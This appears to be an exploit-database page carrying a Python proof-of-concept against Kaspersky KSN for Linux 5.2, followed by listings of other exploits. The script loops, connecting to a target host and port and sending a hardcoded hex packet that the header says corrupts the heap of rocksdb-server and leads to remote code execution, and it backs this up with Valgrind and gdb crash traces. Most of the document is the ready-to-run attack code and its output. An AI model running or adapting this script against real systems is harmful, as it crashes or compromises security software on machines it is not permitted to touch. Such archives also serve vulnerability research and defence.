Menu

Search for hundreds of thousands of exploits

"Kaspersky KSN for Linux 5.2 - Memory Corruption"

Author

Exploit author

"Juan Sacco"

Platform

Exploit platform

linux

Release date

Exploit published date

2018-04-24

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
'''
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
#
# Tested on: Kali i686 GNU/Linux
# CVE: NotYet
#
# Exploit description:
# Kaspersky KSN v5.2 is prone to a remote memory corruption because it
fails to properly filter the input on the remote subscribers, this
leads to heap segments overwrite
# and it leads to remote code execution.
#
#
# Program description:
# Kaspersky KSN for Linux enables cloud-assisted, multi-layered
security for servers and workstations running the Linux operating
system. It delivers reliable protection with minimal impact on
# performance.
# Product homepage: http://kaspersky.com
#
# Example usage: python kaspersky.py 192.168.1.1 6349
#
# [!] Valgrind output:
#
# =3314== Invalid write of size 4
# ==3314==    at 0x24FA74:
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314==    by 0x241814: RequestParser::Parse(unsigned char*,
unsigned long, std::function<void (RespObject const&)>) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314==    by 0x23B740:
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> >
>::HandleRead(boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314==    by 0x22FF56:
boost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,
boost::_bi::bind_t<void, boost::_mfi::mf2<void,
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >,
boost::system::error_code const&, unsigned long>,
boost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,
boost::arg<1> (*)(), boost::arg<2> (*)()> >
>::do_complete(boost::asio::detail::task_io_service*,
boost::asio::detail::task_io_service_operation*,
boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314==    by 0x23647C:
boost::asio::detail::task_io_service::run(boost::system::error_code&)
(in /usr/local/ksn/bin/rocksdb-server)
# ==3314==    by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)
# ==3314==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
# ==3314==
# ==3314==
# ==3314== Process terminating with default action of signal 11
(SIGSEGV): dumping core
# ==3314==  Access not within mapped region at address 0x0
# ==3314==    at 0x24FA74:
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314==    by 0x241814: RequestParser::Parse(unsigned char*,
unsigned long, std::function<void (RespObject const&)>) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314==    by 0x23B740:
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> >
>::HandleRead(boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314==    by 0x22FF56:
boost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,
boost::_bi::bind_t<void, boost::_mfi::mf2<void,
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >,
boost::system::error_code const&, unsigned long>,
boost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,
boost::arg<1> (*)(), boost::arg<2> (*)()> >
>::do_complete(boost::asio::detail::task_io_service*,
boost::asio::detail::task_io_service_operation*,
boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314==    by 0x23647C:
boost::asio::detail::task_io_service::run(boost::system::error_code&)
(in /usr/local/ksn/bin/rocksdb-server)
# ==3314==    by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)
# ==3314==  If you believe this happened as a result of a stack
# ==3314==  overflow in your program's main thread (unlikely but
# ==3314==  possible), you can try to increase the size of the
# ==3314==  main thread stack using the --main-stacksize= flag.
# ==3314==  The main thread stack size used in this run was 8388608.
# ==3314==
# ==3314== HEAP SUMMARY:
# ==3314==     in use at exit: 769,426 bytes in 7,522 blocks
# ==3314==   total heap usage: 15,342 allocs, 7,820 frees, 1,354,534
bytes allocated
# ==3314==
# ==3314== LEAK SUMMARY:
# ==3314==    definitely lost: 8 bytes in 1 blocks
# ==3314==    indirectly lost: 0 bytes in 0 blocks
# ==3314==      possibly lost: 5,328 bytes in 9 blocks
# ==3314==    still reachable: 764,090 bytes in 7,512 blocks
# ==3314==                       of which reachable via heuristic:
# ==3314==                         newarray           : 8,264 bytes in 4 blocks
# ==3314==         suppressed: 0 bytes in 0 blocks
#
# [!] Debugger output:
#
# [----------------------------------registers-----------------------------------]
# RAX: 0x7ffe127426f0 --> 0x7ffe12742800 --> 0x7f7ee28fb1c0 -->
0x7f7ee1d4f090 --> 0x7f7ee1894760
(<_ZN5boost4asio6detail15task_io_serviceD2Ev>:  push   r13)
# RBX: 0x0
# RCX: 0x7f7ee2913000 --> 0x0
# RDX: 0xffffffffffdf6bf0
# RSI: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 -->
0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760
(<_ZN5boost4asio6detail15task_io_serviceD2Ev>:       push   r13)
# RDI: 0x0
# RBP: 0x7f7ee28f5338 --> 0x81
# RSP: 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5
# RIP: 0x7f7ee18b3a74
(<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:
      mov    DWORD PTR [rdi],0x1)
# R8 : 0x0
# R9 : 0x7
# R10: 0x2
# R11: 0x7f7ee00276d0 --> 0xfffcdfc0fffcd800
# R12: 0x29b
# R13: 0x0
# R14: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 -->
0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760
(<_ZN5boost4asio6detail15task_io_serviceD2Ev>:       push   r13)
# R15: 0x7f7ee2924562 --> 0x543ffb3c7ef1cd2b
# EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT
direction overflow)
# [-------------------------------------code-------------------------------------]
#    0x7f7ee18b3a6e:      xchg   ax,ax
#    0x7f7ee18b3a70
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE>:
   push   rbx
#    0x7f7ee18b3a71
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+1>:
 mov    rbx,rdi
# => 0x7f7ee18b3a74
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:
 mov    DWORD PTR [rdi],0x1
#    0x7f7ee18b3a7a
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+10>:
lea    rdi,[rdi+0x10]
#    0x7f7ee18b3a7e
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+14>:
call   0x7f7ee184a8a0
<_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_assignERKS4_@plt>
#    0x7f7ee18b3a83
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+19>:
mov    BYTE PTR [rbx+0x4],0x0
#    0x7f7ee18b3a87
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+23>:
pop    rbx
# [------------------------------------stack-------------------------------------]
# 0000| 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5
# 0008| 0x7ffe127425c8 --> 0x7f7ee18a5815
(<_ZN13RequestParser5ParseEPhmSt8functionIFvRK10RespObjectEE+3317>:
 mov    rdi,QWORD PTR [rsp+0x110])
# 0016| 0x7ffe127425d0 --> 0x7f7ee2901c08 --> 0x5a849d1562a512bd
# 0024| 0x7ffe127425d8 --> 0x7f7ee29242c8 --> 0x10061030045
# 0032| 0x7ffe127425e0 --> 0x361
# 0040| 0x7ffe127425e8 --> 0x0
# 0048| 0x7ffe127425f0 --> 0x7ffe127426e0 --> 0x7ffe127426f0 -->
0x7ffe12742800 --> 0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 (--> ...)
# 0056| 0x7ffe127425f8 --> 0x7ffe127426a0 --> 0x0
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x00007f7ee18b3a74 in
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) ()
# gdb-peda$ where
# #0  0x00007f7ee18b3a74 in
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) ()
# #1  0x00007f7ee18a5815 in RequestParser::Parse(unsigned char*,
unsigned long, std::function<void (RespObject const&)>) ()
# #2  0x00007f7ee189f741 in
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> >
>::HandleRead(boost::system::error_code const&, unsigned long
'''

import binascii
import sys
import socket
import time

def rocksDB(target,port):
    try:
        while 1:
            # Open socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Set reuse ON
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            # Bind port
            s.connect((target, port))
            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " +
"Connected to:"), target, port
            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " +
"Establishing connection.. ")
            packet =
binascii.unhexlify(b'4500036100010000400679947f0000017f000001001419100000000000000000500220009e1700005ce528736b32895950f96218411ca66c9b0842c995eacbfc3eacd8187d3aa8488e1cf1f18491606b9c400c42ec88e7399baa7c3b0bca43de853c74d2fbb2c08c9868ad9688b815d6e5a913937ff05217e18ff28d379fa6985204f7f529990a675d2fc70e1a7dbca8334e4faf30ea31cb33f0c1fabbfc92fbaf20d7e63cfe65ee95711a80a406c26b6e60335d74a02b42a454bc6bbcf5153cb20b77c9686b2fff994b224a3dc5fcbd12a562159d845a8b039abf971bb7c79fe74ca7055560c9c513377881b7a033eb797738fc119758f4c6ea1a960cab1299f5b1a6e99e0be889d8bdf05edc7ca6f14a48d35a5f747887e2330a5cc8b722257ecf32987ad1e24aa56c4685fdae028ca7689bdb66b3d951b8021a34a04114f4208c3f9a6d66bcb7cbeec80a716d69375a88202f3cac2562c9595095c61e693080edd5a3318084d974a2130d5cfe439903d6d5b9b3b553143831c6e01f286da4a2339c91cfce00fe17d7584153ab93e723ce2e859d7aaa9f9574af2dbb4ca4d9f8c8f39f4e89a790e5e4e74bbfd44a721594362f1c71cc48721014f451b837aff64624ea8fbc767c50ada655f23c87195b49b854c3e0d69f1585b663a02ad33cfdfd78c43e3531d6802b7271b7518ded3d93338084ca0e7982dc7c76d82c1b0fed91e5dc567262f46e3bd71b66f9d8283784d666a2be99e397a4abe9495168c880d7f371b87f44b38e61d836ccad8afc8c99518fa1240ab5a2a0685a9d450f4b44fefcc6b64ce8f6ec836922670b31ebf62ea5933e272a62ac8ff2c79d8f15a1220a37e5535ec0998aaf8af2f9d0a0f75e96fad8e8b1ae0e2fff70d831c501048644f700527d61d1f6cb177948e0ebea8d4a01fa9c7ca2c4b3472bcdf17e3cfb3f54fb791a43f114514b6821390d2c16e23ff9ffb0b0caa508b2952b0a497a24ce0d8ad05734111034a71d57a624855b95594b7f158903f03c02213c8de27644a2026de0c7477f1550f9f39450718ddf185eb9c5f9fc7b545c838970c4f7e87b69c570a873d8f64fe08ed23c7b8275f8bf54f080508bb244fbf3dc852968bd8a63a8787c8e496508c597ae9f617bfb096bebf94cbb736a6438163f61479816da9d88e2a3ea6b50a828d9c2c6f51f34e29f4fe588a41e5e3a53515d474a5a52b357')
            # Log the packet in hexa and timestamp
            fileLog = target + ".log"
            logPacket = open("exploit.log", "w+")
            logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " -
Writing to socket: " + binascii.hexlify(bytes(packet))+"\n")
            logPacket.close()

            # Write bytecodes to socket
            print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Writing
to socket: ")
            s.send(bytes(packet))
            # Packet sent:
            print(bytes(packet))
            try:
                data = s.recv(4096)
                print("[" + time.strftime('%a %H:%M:%S') + "]" + " -
"+ "Data received: '{msg}'".format(msg=data))
            except socket.error, e:
                print '[!] Sorry, No data available'
                continue
        s.close()
    except socket.error as error:
        print error
        print "Sorry, something went wrong!"

def howtouse():
    print "Usage: kaspersky.py hostname port"
    print "[*] Mandatory arguments:"
    print "[-] Specify a hostname / port"
    sys.exit(-1)

if __name__ == "__main__":
    try:
        # Set target
        target = sys.argv[1]
        port = int(sys.argv[2])

        print "[*] Kaspersky KSN 0-Day by Juan Sacco <jsacco@exploitpack.com>"
        rocksDB(target, port)
    except IndexError:
        howtouse()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution" webapps linux "Critical Start"
Release Date Title Type Platform Author
2019-06-17 "Netperf 2.6.0 - Stack-Based Buffer Overflow" dos linux "Juan Sacco"
2018-08-29 "SIPP 3.3 - Stack-Based Buffer Overflow" local linux "Juan Sacco"
2018-05-16 "WhatsApp 2.18.31 - Memory Corruption" dos ios "Juan Sacco"
2018-04-24 "Kaspersky KSN for Linux 5.2 - Memory Corruption" dos linux "Juan Sacco"
2018-04-09 "PMS 0.42 - Local Stack-Based Overflow (ROP)" local linux "Juan Sacco"
2018-03-23 "Crashmail 1.6 - Stack-Based Buffer Overflow (ROP)" local linux "Juan Sacco"
2018-03-12 "SC 7.16 - Stack-Based Buffer Overflow" local linux "Juan Sacco"
2018-02-21 "EChat Server 3.1 - 'CHAT.ghp' Buffer Overflow" remote windows "Juan Sacco"
2018-02-07 "Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption" dos multiple "Juan Sacco"
2018-02-05 "BOCHS 2.6-5 - Local Buffer Overflow" local linux "Juan Sacco"
2017-11-01 "WhatsApp 2.17.52 - Memory Corruption" dos ios "Juan Sacco"
2017-07-24 "MAWK 1.3.3-17 - Local Buffer Overflow" local linux "Juan Sacco"
2017-06-28 "Flat Assembler 1.7.21 - Local Buffer Overflow" local linux "Juan Sacco"
2017-06-26 "JAD Java Decompiler 1.5.8e - Local Buffer Overflow (NX Enabled)" local linux "Juan Sacco"
2017-06-09 "Mapscrn 2.03 - Local Buffer Overflow (PoC)" dos linux "Juan Sacco"
2017-05-30 "TiEmu 2.08 - Local Buffer Overflow" local windows "Juan Sacco"
2017-05-26 "JAD Java Decompiler 1.5.8e - Local Buffer Overflow" local linux "Juan Sacco"
2017-05-10 "Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)" remote windows_x86-64 "Juan Sacco"
2017-01-16 "iSelect v1.4 - Local Buffer Overflow" local linux "Juan Sacco"
2016-10-27 "GNU GTypist 2.9.5-2 - Local Buffer Overflow" local linux "Juan Sacco"
2016-09-19 "EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow" local linux "Juan Sacco"
2016-08-05 "zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow" local linux "Juan Sacco"
2016-06-27 "HNB 1.9.18-10 - Local Buffer Overflow" local linux "Juan Sacco"
2016-06-27 "PInfo 0.6.9-5.1 - Local Buffer Overflow" local linux "Juan Sacco"
2016-05-13 "NRSS Reader 0.3.9 - Local Stack Overflow" local linux "Juan Sacco"
2016-05-04 "TRN Threaded USENET News Reader 3.6-23 - Local Stack Overflow" local linux "Juan Sacco"
2016-04-26 "Yasr Screen Reader 0.6.9 - Local Buffer Overflow" local linux "Juan Sacco"
2016-04-13 "Texas Instrument Emulator 3.03 - Local Buffer Overflow" local linux "Juan Sacco"
2016-04-07 "Mess Emulator 0.154-3.1 - Local Buffer Overflow" local linux "Juan Sacco"
2016-02-03 "yTree 1.94-1.1 - Local Buffer Overflow (PoC)" dos linux "Juan Sacco" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected